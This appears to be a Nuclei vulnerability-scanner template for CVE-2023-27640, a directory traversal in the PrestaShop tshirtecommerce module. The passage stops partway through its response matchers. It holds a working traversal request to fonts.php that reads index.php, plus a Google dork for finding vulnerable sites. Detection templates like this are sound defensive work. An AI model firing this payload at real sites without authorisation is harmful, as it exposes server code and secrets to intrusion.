id: CVE-2023-27640 info: name: PrestaShop tshirtecommerce - Directory Traversal author: MaStErChO severity: high description: | The Custom Product Designer (tshirtecommerce) module for PrestaShop allows HTTP requests to be forged using POST and GET parameters, enabling a remote attacker to perform directory traversal on the system and view the contents of code files. reference: - https://www.cvedetails.com/cve/CVE-2023-27640/ - https://security.friendsofpresta.org/module/2023/03/30/tshirtecommerce_cwe-22.html - https://nvd.nist.gov/vuln/detail/CVE-2023-27640 classification: cve-id: CVE-2023-27640 metadata: max-request: 1 product: tshirtecommerce framework: prestashop google-query: inurl:"/tshirtecommerce/" tags: cve,cve2023,prestashop,tshirtecommerce,lfi http: - method: GET path: - "{{BaseURL}}/tshirtecommerce/fonts.php?name=2&type=./../index.php" matchers: - type: dsl dsl: - 'status_code == 200' - 'contains(header, "text/html")' - 'contains_all(base64_decode(body), "PrestaShop", "